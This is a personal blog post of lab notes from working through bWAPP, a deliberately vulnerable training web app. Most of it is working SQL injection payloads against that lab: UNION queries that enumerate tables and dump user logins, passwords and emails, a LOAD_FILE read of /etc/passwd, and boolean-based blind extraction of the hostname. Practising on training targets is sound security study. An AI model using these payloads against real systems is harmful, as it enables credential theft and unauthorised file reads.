Friday, March 11, 2016

Notes from bWAPP v2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to have returned the database and table names of the database.  I also had to experiment with the number of columns that were expected and how it was displayed.



Now I need to find out the structure of the tables...

URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search

The above SQL injection returns the columns of the tables that contain the word password in them so now we can formulate our query to begin extracting information.  The below query counts the records in the users table before we extract it in the event a lot of records are available to be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

This returns that there are 2 records that can be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

The above query returned the login, password, email and if they are an admin of the application in the search results...

--- SQLi GET / Select - With security level set to low...

In this challenge it only returns 1 record at a time because evaluating the code it does not loop around the recordset that is returned.  This adds a small challenge, however, not impossible to do the same thing as above.

SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go

The above query returns the 99th row of the union selected query with also loading the /etc/passwd file so we can gather the user names on the system.

SQL Injection Boolean Based

— The below method would allow for trying each character in a character set until it came back with the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = ‘b - Worked
Iron Man’ AND SUBSTRING(@@hostname,2,1) = ‘W - Worked

— What if we use regular expressions to determine if the letter is between a set of characters…

Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-n] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-g] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-c] - Returns True
— This narrows it down to less than 8 queries to figure out the first character of the hostname…  It would have taken 2 or 28 depending on if you started with a-z or A-Z.






No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...